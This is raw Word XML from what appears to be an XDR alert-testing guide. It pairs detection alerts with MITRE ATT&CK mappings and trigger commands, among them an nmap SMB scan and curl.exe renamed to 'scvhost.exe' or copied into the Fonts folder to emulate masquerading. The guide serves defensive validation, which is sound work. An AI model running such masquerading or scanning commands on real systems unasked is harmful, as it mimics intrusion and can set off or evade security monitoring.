      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device is communicating with a large number of external hosts using SMB ports. This may indicate a possible infected host or an internally-initiated port scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B074F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360436F8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days – there is no baseline history requirement, and the alert will fire with a new XDR instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD96B1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AF2E5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Impact (TA0040), Reconnaissance (TA0043)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745518ED" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Exfiltration (T1020), Network Denial of Service (T1498), Active Scanning (T1595)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA1ED9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6E7A9F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562EF1D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sT -p 445 -v -Pn 17.0.0.0/31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C2511" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A6EEFF" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072B5CD2" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25948FE6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F613974" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE5FB3E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E46D24" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3BBBF9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A6F449" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF64A2C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46882F8F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7195616B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC72D93" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162C22DE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3642568C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NVM Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FEFFAB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The NVM trigger commands are run from cmd.exe on a Windows box. We recommend Windows 11. Two alerts are labeled as cross-platform and will also work on Mac. You must also install Cisco Secure Client configured with the Network Visibility Module to send telemetry up to XDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A30F8D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28985231" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Potential System Process Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695DD97" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A process with a name that looks like a common process has been executed indicating process impersonation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E62E81B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suspicious Endpoint Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F568E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41588471" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cisco NVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDDAA61" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE4873" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerade Task or Service (T1036.004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E04F8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6189D8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1F596" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>copy c:\Windows\System32\curl.exe c:\Windows\Temp\scvhost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53677EB1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; c:\Windows\Temp\scvhost.exe https://www.cisco.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4474283D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37388121" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suspicious Process Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBEA815" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A process was executed on an endpoint from a directory that shouldn't have executables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6642DFFB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suspicious Endpoint Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E977C6C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D05B8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cisco NVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31210616" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defense Evasion (TA0005), Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF35434" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading (T1036)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F24367" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010B191" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B78D7C6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>copy c:\Windows\System32\curl.exe c:\Windows\Fonts\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FAA770" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; c:\Windows\Fonts\curl.exe https://www.cisco.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF64BBB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C408D1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Powershell RDP Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6593297E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system utility Powershell was seen making connections over the RDP port, which is indicative of RDP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ABB272" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
